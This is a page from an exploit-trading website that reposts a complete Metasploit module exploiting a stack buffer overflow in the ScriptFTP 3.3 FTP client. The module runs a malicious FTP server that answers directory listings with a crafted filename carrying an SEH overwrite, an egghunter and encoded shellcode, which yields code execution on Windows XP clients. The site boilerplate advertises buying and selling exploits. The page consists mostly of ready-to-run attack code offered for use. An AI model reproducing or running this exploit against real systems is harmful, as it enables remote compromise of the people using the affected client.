0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ScriptFTP 3.3 Remote Buffer Overflow (MSF)
[#Exploit Title: ScriptFTP 3.3 Remote Buffer Overflow (MSF)
#Date: Sept 20 2011
#Author: otoy
#Version: 3.3
#Tested on: Windows XP SP3
#CVE : -
#EDB-ID: 17876
#Thanks: cyb3r.anbu, spentera-team, dE-team, offsec, exploit-db, corelanc0d3r
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Exploit::Remote::FtpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'ScriptFTP 3.3 Remote Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in ScriptFTP 3.3 ftp client. The overflow is
triggered when the client connects to a FTP server which sends an overly long directory
and filename in response to a GETLIST command.
This will cause an access violation, and will eventually overwrite the saved extended
instruction pointer.
},
'Author' =>
[
'modpr0be', # Original bug
'Cyberheb', # porting from poc to msf
'Otoy', # final msf module
],
'License' => MSF_LICENSE,
'Version' => "0",
'References' =>
[
[ 'OSVDB', '75633'],
[ 'URL', 'http://www.digital-echidna.org/2011/09/scriptftp-3-3-remote-buffer-overflow-exploit-0day/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1000,
'DisableNops' => true,
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'BadChars' => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x2F\x5c\x3c\x3e\x5e\x7e",
'EncoderOptions' =>
{
'BufferRegister' => 'EDX',
}
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Universal', { 'Ret' => "\x45\x5B", 'Offset' => 1746 } ],
],
'Privileged' => false,
'DisclosureDate' => 'Sept 20 2011',
'DefaultTarget' => 0))
end
def setup
super
end
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
#Unicode Encoder
def get_unicode_payload(p)
encoder = framework.encoders.create("x86/unicode_upper")
encoder.datastore.import_options_from_hash( {'BufferRegister'=>'EAX'} )
unicode_payload = encoder.encode(p, nil, nil, platform)
return unicode_payload
end
def on_client_command_list(c,arg)
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")
sampahawal = "A" * 1746
nseh = "\x61\x62"
seh = target['Ret']
sampahbawah = 1250
#prepare for align
align = "\x60" #pushad
align << "\x73" #nop/align
align << "\x53" #push ebx
align << "\x73" #nop/align
align << "\x58" #pop eax
align << "\x73" #nop/align
align << "\x05\x02\x11" #add eax,0x11000200
align << "\x73" #nop/align
align << "\x2d\x01\x11" #sub eax,0x11000120
align << "\x73" #nop/align
#align after egg
align2 = "\x73\x57\x73\x58\x73" #nop/push edi/nop/pop eax/nop
align2 << "\xb9\x1b\xaa" #mov ecx,0xaa001b00
align2 << "\xe8\x73" #add al,ch + nop
align2 << "\x50\x73\xc3" #push eax,nop,ret
#walking
walk = "\x50" #push eax
walk << "\x73" #nop/align
walk << "\xc3" #ret
#egghunter
egghunter = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYA"
egghunter << "IAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA5"
egghunter << "8AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZB"
egghunter << "ABABABAB30APB944JBQVCQGZKOLO12PRQZKR1"
egghunter << "HXMNNOLKUQJRTJO6XKPNPKP44TKJZ6O3EJJ6O"
egghunter << "SEYWKOYWA"
#junk
sampah1 = "\x44" * 106 + "\x73"
sampah2 = "\x42" * 544
#egg
telur = "0t0t"
#payload
stubget = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
palpha = stubget + payload.encoded
puni = get_unicode_payload(palpha)
#filename
filename = sampahawal
filename << nseh
filename << seh
filename << align
filename << walk
filename << sampah1
filename << egghunter
filename << sampah2
filename << telur
filename << align2
filename << puni
filename << sampah1
print_status(" - Sending directory list via data connection")
dirlist = "-rwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{filename}.txt\r\n"
dirlist << "drwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{filename}\r\n"
dirlist << "-rwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{filename}.txt\r\n"
conn.put(dirlist)
conn.close
return
end
end
# 0day.today [2024-11-15] #